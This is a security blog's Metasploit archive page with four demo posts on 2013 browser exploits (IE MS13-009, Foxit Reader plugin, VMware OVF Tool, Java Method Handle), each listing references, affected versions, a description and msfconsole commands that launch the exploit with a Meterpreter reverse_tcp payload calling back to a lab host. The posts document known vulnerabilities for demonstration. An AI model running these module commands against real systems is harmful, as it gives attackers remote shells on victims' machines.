Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS13-009 Microsoft Internet Explorer SLayoutRun UAF Metasploit Demo

23/02/2013Exploits, MetasploitCVE-2013-0025, Internet Explorer, Microsoft, MS13-009wow

Timeline :

Vulnerability discovered and reported to vendor by Scott Bell
Coordinated public release of the vulnerability the 2013-02-12
Metasploit PoC provided the 2013-02-21

PoC provided by :

Scott Bell

Reference(s) :

CVE-2013-0025
OSVDB-90122
BID-57830
MS13-009

Affected version(s) :

Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.

Commands :

use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

18/02/2013Exploits, MetasploitFoxit, Foxit Reader, OSVDB-89030wow

Timeline :

Vulnerability discovered by rgod the 2013-01-07
Vendor public release of the vulnerability the 2013-01-14
Metasploit PoC provided the 2013-02-12

PoC provided by :

rgod
Sven Krewitt
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s) :

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Integral SP1 with :

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description :

This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

Commands :

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-3569 VMWare OVF Tool Format String Vulnerability Metasploit Demo

06/02/2013Exploits, MetasploitCVE-2012-3569, VMSA-2012-0015, VMware, VMWare OVF Toolwow

Timeline :

Vulnerability discovered and reported to vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability the 2012-11-08
Metasploit PoC provided the 2013-02-04

PoC provided by :

Jeremy Brown
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015

Affected version(s) :

VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows

Tested on Windows XP Pro SP3 with :

VMware OVF Tool 2.1

Description :

This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Commands :

use exploit/windows/browser/ovftool_format_string
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

23/01/2013Exploits, MetasploitCVE-2012-5088, Java, Oracle, Oracle Java Critical Patch Update, Oracle Java Critical Patch Update October 2012wow

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Metasploit PoC provided the 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5088
OSVDB-86352
BID-56057
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Eric Romang Blog

aka wow on ZATAZ.com

Category Archives: Metasploit

MS13-009 Microsoft Internet Explorer SLayoutRun UAF Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP Pro SP3 with :

Description :

Commands :

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows 7 Integral SP1 with :

Description :

Commands :

CVE-2012-3569 VMWare OVF Tool Format String Vulnerability Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP Pro SP3 with :

Description :

Commands :

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows 8 Pro with :

Description :

Commands :